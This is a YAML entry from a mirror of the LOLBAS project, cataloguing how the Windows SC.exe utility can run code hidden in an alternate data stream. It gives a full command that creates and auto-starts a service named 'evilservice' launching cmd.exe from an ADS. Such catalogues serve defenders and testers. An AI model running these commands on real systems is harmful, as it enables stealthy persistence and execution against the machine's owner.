mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
20 lines
609 B
YAML
20 lines
609 B
YAML
|
---
|
||
|
Name: SC.exe
|
||
|
Description: Execute, Read ADS, Create Service, Start Service
|
||
|
Author: ''
|
||
|
Created: '2018-05-25'
|
||
|
Categories: []
|
||
|
Commands:
|
||
|
- Command: |
|
||
|
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
|
||
|
sc start evilservice
|
||
|
Description: ''
|
||
|
Full Path:
|
||
|
- C:\Windows\System32\sc.exe
|
||
|
- C:\Windows\SysWOW64\sc.exe
|
||
|
Code Sample: []
|
||
|
Detection: []
|
||
|
Resources:
|
||
|
- https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||
|
Notes: Thanks to Oddvar Moe - @oddvarmoe
|